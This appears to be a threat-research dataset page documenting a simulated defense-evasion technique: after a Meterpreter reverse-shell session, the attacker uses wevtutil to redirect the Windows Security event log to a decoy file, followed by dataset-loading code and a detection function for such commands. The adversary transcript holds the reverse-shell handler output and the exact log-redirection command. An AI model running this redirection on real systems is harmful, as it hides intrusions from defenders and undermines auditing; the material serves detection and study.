Modifying Security Event Log File Path via Modification of Log Configuration#

Metadata#

Contributors

Jose Rodriguez @Cyb3rPandaH

Creation Date

2022/07/05

Modification Date

2022/07/05

Tactics

TA0005

Techniques

T1562.002

Tags

wevtutil,cmd,microsoft windows security auditing

Dataset Description#

After getting a shell with elevated privileges on the target, we used wevtutil.exe to modify the configuration of the Security event log. The standard log path C:\Windows\System32\Winevt\Logs\Security.evtx was replaced so that events from Microsoft Windows Security Auditing are written to a different file (Not-Important-Log.evtx). This dataset was generated using a Windows 10 Enterprise Evaluation edition (Version: 21H1, OS Build: 19043.1766) and Kali Linux (Version: 2021.3).

Simulation Metadata#

Tools#

| type   | Name | Module |
|--------|------|--------|
| Manual | cmd  | cmd    |

Adversary View#

msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://10.0.10.104:8443
[*] https://10.0.10.104:8443 handling request from 10.0.10.102; (UUID: if81stxw) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 2 opened (10.0.10.104:8443 -> 127.0.0.1) at 2022-07-05 17:00:38 -0400

meterpreter > shell
Process 1912 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19043.1766]
(c) Microsoft Corporation. All rights reserved.

C:\Users\pedro\Downloads>wevtutil get-log Security
wevtutil get-log Security
name: Security
enabled: true
type: Admin
owningPublisher: 
isolation: Custom
channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)
logging:
  logFileName: %SystemRoot%\System32\Winevt\Logs\Security.evtx
  retention: false
  autoBackup: false
  maxSize: 1000000000
publishing:
  fileMax: 1

C:\Users\pedro\Downloads>wevtutil set-log Security /logfilename:"C:\Windows\System32\winevt\Not-Important-Log.evtx"
wevtutil set-log Security /logfilename:"C:\Windows\System32\winevt\Not-Important-Log.evtx"

C:\Users\pedro\Downloads>wevtutil get-log Security
wevtutil get-log Security
name: Security
enabled: true
type: Admin
owningPublisher: 
isolation: Custom
channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)
logging:
  logFileName: C:\Windows\System32\winevt\Not-Important-Log.evtx
  retention: false
  autoBackup: false
  maxSize: 1000000000
publishing:
  fileMax: 1

C:\Users\pedro\Downloads>

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

# URL of the compressed dataset (a zip containing one JSON-lines file)
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_wevtutil_modify_security_eventlog_path.zip"
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the first (and only) member and keep its local path for the next step
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

import pandas as pd

# The dataset is stored as JSON lines (one event per line), hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)
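As an added example, not part of the dataset page or the Security-Datasets project, the function below scans process-creation events for a wevtutil set-log (or its short form sl) invocation that supplies a new log file path via /logfilename or /lfn, and flags paths that leave the default Winevt\Logs directory. The sample events and the field names (Channel, EventID, CommandLine) are constructed here to mirror the Sysmon EventID 1 and Security 4688 records exported in these datasets; they are assumptions, not values taken from this page.

```python
import json
import re

# Constructed sample events in JSON-lines form; field names are assumed to
# follow the Sysmon EventID 1 / Security 4688 schema used by the dataset export.
SAMPLE_EVENTS = r"""
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "CommandLine": "wevtutil get-log Security"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "CommandLine": "wevtutil set-log Security /logfilename:\"C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\""}
{"Channel": "Security", "EventID": 4688, "CommandLine": "wevtutil sl Security /lfn:C:\\Temp\\s.evtx"}
{"Channel": "Security", "EventID": 4688, "CommandLine": "cmd.exe /c whoami"}
"""

# (Channel, EventID) pairs that carry a process command line. Security 4688 only
# includes CommandLine when "Include command line in process creation events" is on.
PROC_CREATE = {("Microsoft-Windows-Sysmon/Operational", 1), ("Security", 4688)}
SET_LOG_RE = re.compile(r"wevtutil(?:\.exe)?\s+(?:sl|set-log)\s+(\S+)", re.IGNORECASE)
LOGFILE_RE = re.compile(r'/(?:lfn|logfilename):(?:"([^"]*)"|(\S+))', re.IGNORECASE)
DEFAULT_LOG_DIR = "\\system32\\winevt\\logs"


def find_log_path_changes(json_lines):
    """Return one finding per event that redirects an event log file path."""
    findings = []
    for line in json_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if (ev.get("Channel"), ev.get("EventID")) not in PROC_CREATE:
            continue
        cmd = ev.get("CommandLine", "")
        log = SET_LOG_RE.search(cmd)
        path = LOGFILE_RE.search(cmd)
        if not log or not path:
            continue  # not a set-log call, or one that does not change the file path
        new_path = path.group(1) if path.group(1) is not None else path.group(2)
        directory = new_path.lower().rsplit("\\", 1)[0] if "\\" in new_path else ""
        findings.append({
            "log": log.group(1),
            "new_path": new_path,
            "event_id": ev["EventID"],
            # Any redirection is worth review; leaving Winevt\Logs is a stronger signal.
            "outside_default_dir": not directory.endswith(DEFAULT_LOG_DIR),
        })
    return findings
```

The same function runs over the dataset loaded above via `find_log_path_changes(df.to_json(orient="records", lines=True))`, provided the export carries the assumed field names.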